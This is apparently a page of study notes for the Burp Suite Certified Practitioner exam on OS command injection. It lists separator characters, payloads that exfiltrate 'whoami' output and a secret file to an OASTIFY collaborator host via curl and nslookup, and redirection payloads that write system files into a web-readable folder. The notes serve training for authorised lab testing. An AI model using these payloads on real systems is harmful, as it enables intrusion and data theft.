bscp notes
  • Resources
  • Exam Hints/Tips
  • Burp dynamic header in Intruder
  • Methodology
  • Payloads
  • Stage 1
    • XSS
    • Information disclosure
    • DOM-based
    • Web Cache Poison
    • Host Headers
    • HTTP Req Smuggling
    • Authentication
  • Stage 2
    • oAuth
    • CSRF
    • Password Reset
    • SQLi
      • SQLi Cheat Sheet
    • JWT
    • Prototype Pollution
    • API Testing - TODO
    • Access Control
    • CORS
  • DATA EXFILTRATION
    • XXE Injections
    • SSRF
    • SSTI
    • Path Traversal
    • File Upload
    • Insecure Desarialization
    • OS Cmd Injection
  • graphql api vulns
  • no sql
  • web cache deception
  • clickjacking
  • websockets
  • web cache deception
Powered by GitBook
On this page
  1. DATA EXFILTRATION

OS Cmd Injection

Using seperators to inject command

 &&
 &
 ||
 |
 ;
 `
 '
 "
 0x0a
 \n

Feedback injection in mail

email=carlos@exam.net||curl+`whoami`.OASTIFY.COM||

||$(curl $(cat /home/carlos/secret).OASTIFY.COM)||

email=peanut2019@nuts.net||nslookup+`whoami`.OASTIFY.COM||

Output redirection

Identify the working directory using pwd command output redirected, and appending to output.txt file every bash command stdout.

||pwd>output.txt||
||echo>>output.txt||
||cat+/etc/hosts>>/var/www/images/output.txt||
||echo>>output.txt||
||ls+-al>>/var/www/images/output.txt||
||echo>>output.txt||
||whoami>>/var/www/images/output.txt||

get output data

GET /image?filename=output.txt HTTP/2
PreviousInsecure DesarializationNextgraphql api vulns

Last updated 7 months ago

If OS command injection identified, and filter in place preventing complex command injection, attempt to redirect output to writable folder. Identify a vulnerability that allow reading of files only in current WEB APP.

path traversal